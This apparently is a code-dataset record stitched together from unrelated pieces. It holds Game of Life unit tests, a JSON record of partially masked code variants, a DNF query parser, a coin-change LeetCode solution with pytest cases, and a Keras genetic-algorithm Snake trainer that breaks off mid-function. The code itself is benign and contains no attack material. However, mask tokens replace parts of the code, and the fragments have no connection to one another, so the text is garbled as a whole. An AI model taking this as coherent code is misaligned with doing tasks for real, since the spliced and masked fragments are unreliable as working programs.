[1, 0, 1],
[1, 1, 1]
])
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0,]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "f644ff322d1268092dbdcbfc1a3c76006424184b",
"index": 1482,
"step-1": "<mask token>\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n <mask token>\n <mask token>\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])\n <mask token>\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_test_board(size):\n board = Board(size)\n board[0, 0].state = ALIVE\n board[0, 1].state = ALIVE\n board[2, 1].state = ALIVE\n return board\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])\n\n def test_overpopulation(self):\n init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def 
test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom game_of_life.board import Board\nfrom game_of_life.cell import Cell, ALIVE, DEAD\n\n\ndef create_test_board(size):\n board = Board(size)\n board[0, 0].state = ALIVE\n board[0, 1].state = ALIVE\n board[2, 1].state = ALIVE\n return board\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])\n\n def test_overpopulation(self):\n init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 
0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nfrom game_of_life.board import Board\nfrom game_of_life.cell import Cell, ALIVE, DEAD\n\n\ndef create_test_board(size):\n board = Board(size)\n board[0, 0].state = ALIVE\n board[0, 1].state = ALIVE\n board[2, 1].state = ALIVE\n return board\n\n\nclass BoardTests(unittest.TestCase):\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [\n None, None, ALIVE,\n ALIVE, DEAD,\n ALIVE, DEAD, None\n ])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [\n [1, 1, 0],\n [1, 1, 0],\n [0, 0, 0]\n ])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [\n [0, 1, 0],\n [0, 1, 0],\n [0, 0, 0]\n ])\n\n def test_overpopulation(self):\n init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [\n [1, 1, 1],\n [1, 0, 1],\n [1, 1, 1]\n ])\n\n\nclass CellTest(unittest.TestCase):\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0,]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n 
self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
10,
11,
14,
15,
16
]
}
|
[
10,
11,
14,
15,
16
] |
import dnf_converter
def parse(query):
print("parsing the query...")
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query["$or"]:
clauses = []
if "$and" in cp:
for clause in cp["$and"]:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({ "cp": cp, "clauses": clauses })
return cp_clause_list, clause_list
|
normal
|
{
"blob_id": "999de0965efa3c1fe021142a105dcf28184cd5ba",
"index": 43,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n",
"step-3": "import dnf_converter\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n",
"step-4": "import dnf_converter\n\ndef parse(query):\n\tprint(\"parsing the query...\")\n\tquery = dnf_converter.convert(query)\n\tcp_clause_list = []\n\tclause_list = []\n\tfor cp in query[\"$or\"]:\n\t\tclauses = []\n\t\tif \"$and\" in cp:\n\t\t\tfor clause in cp[\"$and\"]:\n\t\t\t\tclauses.append(clause)\n\t\t\t\tclause_list.append(clause)\n\t\telse:\n\t\t\tclause = cp\n\t\t\tclauses.append(clause)\n\t\t\tclause_list.append(clause)\n\t\tcp_clause_list.append({ \"cp\": cp, \"clauses\": clauses })\n\treturn cp_clause_list, clause_list",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def change(self, amount: int, coins: List[int]) ->int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,
coins[i]))
return rec(0, amount)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def change(self, amount: int, coins: List[int]) ->int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,
coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [(5, [1, 2, 5], 4), (3,
[2], 0), (10, [10], 1)])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(['-s', '-v'] + sys.argv))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import sys
from functools import lru_cache
from typing import List
import pytest
class Solution:
def change(self, amount: int, coins: List[int]) ->int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,
coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [(5, [1, 2, 5], 4), (3,
[2], 0), (10, [10], 1)])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(['-s', '-v'] + sys.argv))
<|reserved_special_token_1|>
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <[email protected]>
#
# Distributed under terms of the MIT license.
"""
You are given coins of different denominations and a total amount of money. Write a function to compute the number of combinations that make up that amount. You may assume that you have infinite number of each kind of coin.
Example 1:
Input: amount = 5, coins = [1, 2, 5]
Output: 4
Explanation: there are four ways to make up the amount:
5=5
5=2+2+1
5=2+1+1+1
5=1+1+1+1+1
Example 2:
Input: amount = 3, coins = [2]
Output: 0
Explanation: the amount of 3 cannot be made up just with coins of 2.
Example 3:
Input: amount = 10, coins = [10]
Output: 1
Note:
You can assume that
1. 0 <= amount <= 5000
2. 1 <= coin <= 5000
3. the number of coins is less than 500
4. the answer is guaranteed to fit into signed 32-bit integer
"""
import sys
from functools import lru_cache
from typing import List
import pytest
class Solution:
def change(self, amount: int, coins: List[int]) -> int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i+1, amount-c) for c in range(0, amount+1, coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [
(5, [1,2,5], 4),
(3, [2], 0),
(10, [10], 1),
])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
flexible
|
{
"blob_id": "332c530d221c9441d6ff3646f8e9226dc78067f9",
"index": 2902,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def change(self, amount: int, coins: List[int]) ->int:\n coins = sorted(coins, reverse=True)\n\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,\n coins[i]))\n return rec(0, amount)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def change(self, amount: int, coins: List[int]) ->int:\n coins = sorted(coins, reverse=True)\n\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,\n coins[i]))\n return rec(0, amount)\n\n\[email protected]('amount, coins, expected', [(5, [1, 2, 5], 4), (3,\n [2], 0), (10, [10], 1)])\ndef test(amount, coins, expected):\n assert expected == Solution().change(amount, coins)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main(['-s', '-v'] + sys.argv))\n",
"step-4": "<mask token>\nimport sys\nfrom functools import lru_cache\nfrom typing import List\nimport pytest\n\n\nclass Solution:\n\n def change(self, amount: int, coins: List[int]) ->int:\n coins = sorted(coins, reverse=True)\n\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,\n coins[i]))\n return rec(0, amount)\n\n\[email protected]('amount, coins, expected', [(5, [1, 2, 5], 4), (3,\n [2], 0), (10, [10], 1)])\ndef test(amount, coins, expected):\n assert expected == Solution().change(amount, coins)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main(['-s', '-v'] + sys.argv))\n",
"step-5": "\n#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2020 sungminoh <[email protected]>\n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\nYou are given coins of different denominations and a total amount of money. Write a function to compute the number of combinations that make up that amount. You may assume that you have infinite number of each kind of coin.\n\nExample 1:\n\nInput: amount = 5, coins = [1, 2, 5]\nOutput: 4\nExplanation: there are four ways to make up the amount:\n5=5\n5=2+2+1\n5=2+1+1+1\n5=1+1+1+1+1\n\nExample 2:\n\nInput: amount = 3, coins = [2]\nOutput: 0\nExplanation: the amount of 3 cannot be made up just with coins of 2.\n\nExample 3:\n\nInput: amount = 10, coins = [10]\nOutput: 1\n\nNote:\n\nYou can assume that\n 1. 0 <= amount <= 5000\n 2. 1 <= coin <= 5000\n 3. the number of coins is less than 500\n 4. the answer is guaranteed to fit into signed 32-bit integer\n\"\"\"\nimport sys\nfrom functools import lru_cache\nfrom typing import List\nimport pytest\n\n\nclass Solution:\n def change(self, amount: int, coins: List[int]) -> int:\n coins = sorted(coins, reverse=True)\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i+1, amount-c) for c in range(0, amount+1, coins[i]))\n return rec(0, amount)\n\n\[email protected]('amount, coins, expected', [\n (5, [1,2,5], 4),\n (3, [2], 0),\n (10, [10], 1),\n])\ndef test(amount, coins, expected):\n assert expected == Solution().change(amount, coins)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main([\"-s\", \"-v\"] + sys.argv))\n\n",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
<|reserved_special_token_0|>
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
<|reserved_special_token_0|>
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
<|reserved_special_token_0|>
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
<|reserved_special_token_0|>
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
total_fitness = sum(fitness)
for i in range(total_models // 2):
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
new = model_crossover(parent_1, parent_2)
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
<|reserved_special_token_0|>
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
def model_crossover(parent_1, parent_2):
"""
Produce offspring based on the best parents
"""
global current_pool
weight1 = current_pool[parent_1].get_weights()
weight2 = current_pool[parent_2].get_weights()
new_weight1 = weight1
new_weight2 = weight2
gene = random.randint(0, len(new_weight1) - 1)
new_weight1[gene] = weight2[gene]
new_weight2[gene] = weight1[gene]
return np.asarray([new_weight1, new_weight2])
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
